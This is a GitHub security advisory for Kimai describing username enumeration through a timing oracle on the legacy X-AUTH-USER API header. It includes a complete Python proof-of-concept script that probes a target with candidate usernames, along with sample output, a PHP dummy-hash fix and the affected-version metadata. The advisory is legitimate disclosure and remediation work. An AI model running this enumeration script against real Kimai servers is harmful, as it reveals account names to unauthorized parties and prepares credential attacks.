GHSA-JRC6-FMHW-FPQ2
Vulnerability from github – Published: 2026-04-17 22:30 – Updated: 2026-04-17 22:30
VLAI?
Summary
Kimai: Username enumeration via timing on X-AUTH-USER
Details
Details
src/API/Authentication/TokenAuthenticator.php calls loadUserByIdentifier() first and only invokes the password hasher (argon2id) when a user is returned. When the username does not exist, the request returns roughly 25 ms faster than when it does. The response body is the same in both cases ({"message":"Invalid credentials"}, HTTP 403), so the leak is purely timing.
The /api/* firewall has no login_throttling configured, so the probe is unbounded.
The legacy X-AUTH-USER / X-AUTH-TOKEN headers are still accepted by default in 2.x. No prior authentication, no API token, and no session cookie are required.
Proof of concept
#!/usr/bin/env python3
"""Kimai username enumeration via X-AUTH-USER timing oracle."""
import argparse
import ssl
import statistics
import sys
import time
import urllib.error
import urllib.request
PROBE_PATH = "/api/users/me"
BASELINE_USER = "baseline_no_such_user_zzz"
DUMMY_TOKEN = "x" * 32
def probe(url, user, ctx):
req = urllib.request.Request(
url + PROBE_PATH,
headers={"X-AUTH-USER": user, "X-AUTH-TOKEN": DUMMY_TOKEN},
)
t0 = time.perf_counter()
try:
urllib.request.urlopen(req, context=ctx, timeout=10).read()
except urllib.error.HTTPError as e:
e.read()
return (time.perf_counter() - t0) * 1000.0
def median_ms(url, user, samples, ctx):
return statistics.median(probe(url, user, ctx) for _ in range(samples))
def load_candidates(path):
with open(path) as f:
return [ln.strip() for ln in f if ln.strip() and not ln.startswith("#")]
def main():
ap = argparse.ArgumentParser(description=__doc__.strip())
ap.add_argument("-u", "--url", required=True,
help="base URL, e.g. https://kimai.example")
ap.add_argument("-l", "--list", required=True, metavar="FILE",
help="one candidate username per line")
ap.add_argument("-t", "--threshold", type=float, default=15.0, metavar="MS",
help="median delta over baseline that flags a real user")
ap.add_argument("-n", "--samples", type=int, default=15)
ap.add_argument("--verify-tls", action="store_true")
args = ap.parse_args()
url = args.url.rstrip("/")
ctx = None if args.verify_tls else ssl._create_unverified_context()
candidates = load_candidates(args.list)
baseline = median_ms(url, BASELINE_USER, args.samples, ctx)
print(f"baseline: {baseline:.1f} ms", file=sys.stderr)
width = max(len(u) for u in candidates)
print(f"{'username':<{width}} {'median':>8} {'delta':>8} verdict")
print("-" * (width + 30))
for user in candidates:
m = median_ms(url, user, args.samples, ctx)
delta = m - baseline
verdict = "REAL" if delta > args.threshold else "-"
print(f"{user:<{width}} {m:>6.1f}ms {delta:>+6.1f}ms {verdict}")
if __name__ == "__main__":
main()
Usage:
$ ./timing_oracle.py -u https://target -l users.txt -n 15
[*] calibrating baseline with 15 samples
[*] baseline median: 37.7 ms
[*] probing 13 candidates (n=15, threshold=15.0 ms)
username median delta verdict
----------------------------------------------------------
user1@example.com 64.2ms +26.5ms REAL
user2@example.com 72.4ms +34.7ms REAL
user3@example.com 70.0ms +32.3ms REAL
tester.nonexistent@example.com 37.2ms -0.5ms -
admin 63.6ms +25.9ms REAL
administrator 38.2ms +0.4ms -
root 37.3ms -0.4ms -
test 33.6ms -4.1ms -
demo 38.2ms +0.5ms -
kimai 37.0ms -0.7ms -
nonexistent_user_aaa 38.1ms +0.4ms -
nonexistent_user_bbb 37.5ms -0.2ms -
nonexistent_user_ccc 38.4ms +0.7ms -
In this run, four real accounts were identified out of thirteen candidates with no false positives or false negatives. Probing took roughly five seconds per username at fifteen samples each.
Fix
In TokenAuthenticator::authenticate(), run the password hasher against a fixed dummy hash when the user is not found, so the response time does not depend on user existence:
private const DUMMY_HASH = '$argon2id$v=19$m=65536,t=4,p=1$ZHVtbXlzYWx0ZHVtbXk$YQ4N4lU0Sg9hRT2KhRGwLp7y4VZqkM5KQ8wYJ5HtoX0';
try {
$user = $this->userProvider->loadUserByIdentifier($credentials['username']);
} catch (UserNotFoundException $e) {
$this->passwordHasherFactory
->getPasswordHasher(User::class)
->verify(self::DUMMY_HASH, $credentials['password']);
throw $e;
}
The dummy hash must use the same algorithm and parameters as real user hashes so that verify() consumes equivalent CPU. Generate it once with password_hash('dummy', PASSWORD_ARGON2ID) and pin it as a constant.
Relevance
The practical security impact is very limited. The response body and HTTP status are identical, and the only observable difference is a relatively small timing gap, which is even less relevant when the requests is executed against a network instead of a local installation. In addition, this authentication method has already been deprecated since April 2024 and is scheduled for removal after Q2 2026, so the issue only affects a legacy mechanism that is already being phased out. 
Severity ?
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.53.0"
},
"package": {
"ecosystem": "Packagist",
"name": "kimai/kimai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.54.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-17T22:30:59Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "## Details\n\n`src/API/Authentication/TokenAuthenticator.php` calls `loadUserByIdentifier()` first and only invokes the password hasher (argon2id) when a user is returned. When the username does not exist, the request returns roughly 25 ms faster than when it does. The response body is the same in both cases (`{\"message\":\"Invalid credentials\"}`, HTTP 403), so the leak is purely timing.\n\nThe `/api/*` firewall has no `login_throttling` configured, so the probe is unbounded.\n\nThe legacy `X-AUTH-USER` / `X-AUTH-TOKEN` headers are still accepted by default in 2.x. No prior authentication, no API token, and no session cookie are required.\n\n## Proof of concept\n\n```python\n#!/usr/bin/env python3\n\"\"\"Kimai username enumeration via X-AUTH-USER timing oracle.\"\"\"\n\nimport argparse\nimport ssl\nimport statistics\nimport sys\nimport time\nimport urllib.error\nimport urllib.request\n\nPROBE_PATH = \"/api/users/me\"\nBASELINE_USER = \"baseline_no_such_user_zzz\"\nDUMMY_TOKEN = \"x\" * 32\n\n\ndef probe(url, user, ctx):\n req = urllib.request.Request(\n url + PROBE_PATH,\n headers={\"X-AUTH-USER\": user, \"X-AUTH-TOKEN\": DUMMY_TOKEN},\n )\n t0 = time.perf_counter()\n try:\n urllib.request.urlopen(req, context=ctx, timeout=10).read()\n except urllib.error.HTTPError as e:\n e.read()\n return (time.perf_counter() - t0) * 1000.0\n\n\ndef median_ms(url, user, samples, ctx):\n return statistics.median(probe(url, user, ctx) for _ in range(samples))\n\n\ndef load_candidates(path):\n with open(path) as f:\n return [ln.strip() for ln in f if ln.strip() and not ln.startswith(\"#\")]\n\n\ndef main():\n ap = argparse.ArgumentParser(description=__doc__.strip())\n ap.add_argument(\"-u\", \"--url\", required=True,\n help=\"base URL, e.g. https://kimai.example\")\n ap.add_argument(\"-l\", \"--list\", required=True, metavar=\"FILE\",\n help=\"one candidate username per line\")\n ap.add_argument(\"-t\", \"--threshold\", type=float, default=15.0, metavar=\"MS\",\n help=\"median delta over baseline that flags a real user\")\n ap.add_argument(\"-n\", \"--samples\", type=int, default=15)\n ap.add_argument(\"--verify-tls\", action=\"store_true\")\n args = ap.parse_args()\n\n url = args.url.rstrip(\"/\")\n ctx = None if args.verify_tls else ssl._create_unverified_context()\n candidates = load_candidates(args.list)\n\n baseline = median_ms(url, BASELINE_USER, args.samples, ctx)\n print(f\"baseline: {baseline:.1f} ms\", file=sys.stderr)\n\n width = max(len(u) for u in candidates)\n print(f\"{\u0027username\u0027:\u003c{width}} {\u0027median\u0027:\u003e8} {\u0027delta\u0027:\u003e8} verdict\")\n print(\"-\" * (width + 30))\n for user in candidates:\n m = median_ms(url, user, args.samples, ctx)\n delta = m - baseline\n verdict = \"REAL\" if delta \u003e args.threshold else \"-\"\n print(f\"{user:\u003c{width}} {m:\u003e6.1f}ms {delta:\u003e+6.1f}ms {verdict}\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\nUsage:\n\n```\n$ ./timing_oracle.py -u https://target -l users.txt -n 15\n[*] calibrating baseline with 15 samples\n[*] baseline median: 37.7 ms\n[*] probing 13 candidates (n=15, threshold=15.0 ms)\n\nusername median delta verdict\n----------------------------------------------------------\nuser1@example.com 64.2ms +26.5ms REAL\nuser2@example.com 72.4ms +34.7ms REAL\nuser3@example.com 70.0ms +32.3ms REAL\ntester.nonexistent@example.com 37.2ms -0.5ms -\nadmin 63.6ms +25.9ms REAL\nadministrator 38.2ms +0.4ms -\nroot 37.3ms -0.4ms -\ntest 33.6ms -4.1ms -\ndemo 38.2ms +0.5ms -\nkimai 37.0ms -0.7ms -\nnonexistent_user_aaa 38.1ms +0.4ms -\nnonexistent_user_bbb 37.5ms -0.2ms -\nnonexistent_user_ccc 38.4ms +0.7ms -\n```\n\nIn this run, four real accounts were identified out of thirteen candidates with no false positives or false negatives. Probing took roughly five seconds per username at fifteen samples each.\n\n## Fix\n\nIn `TokenAuthenticator::authenticate()`, run the password hasher against a fixed dummy hash when the user is not found, so the response time does not depend on user existence:\n\n```php\nprivate const DUMMY_HASH = \u0027$argon2id$v=19$m=65536,t=4,p=1$ZHVtbXlzYWx0ZHVtbXk$YQ4N4lU0Sg9hRT2KhRGwLp7y4VZqkM5KQ8wYJ5HtoX0\u0027;\n\ntry {\n $user = $this-\u003euserProvider-\u003eloadUserByIdentifier($credentials[\u0027username\u0027]);\n} catch (UserNotFoundException $e) {\n $this-\u003epasswordHasherFactory\n -\u003egetPasswordHasher(User::class)\n -\u003everify(self::DUMMY_HASH, $credentials[\u0027password\u0027]);\n throw $e;\n}\n```\n\nThe dummy hash must use the same algorithm and parameters as real user hashes so that `verify()` consumes equivalent CPU. Generate it once with `password_hash(\u0027dummy\u0027, PASSWORD_ARGON2ID)` and pin it as a constant.\n\n## Relevance\n\nThe practical security impact is very limited. The response body and HTTP status are identical, and the only observable difference is a relatively small timing gap, which is even less relevant when the requests is executed against a network instead of a local installation. In addition, [this authentication method has already been deprecated since April 2024 and is scheduled for removal after Q2 2026](https://www.kimai.org/en/blog/2026/removing-api-passwords), so the issue only affects a legacy mechanism that is already being phased out. \ufffc",
"id": "GHSA-jrc6-fmhw-fpq2",
"modified": "2026-04-17T22:30:59Z",
"published": "2026-04-17T22:30:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kimai/kimai/security/advisories/GHSA-jrc6-fmhw-fpq2"
},
{
"type": "PACKAGE",
"url": "https://github.com/kimai/kimai"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Kimai: Username enumeration via timing on X-AUTH-USER"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…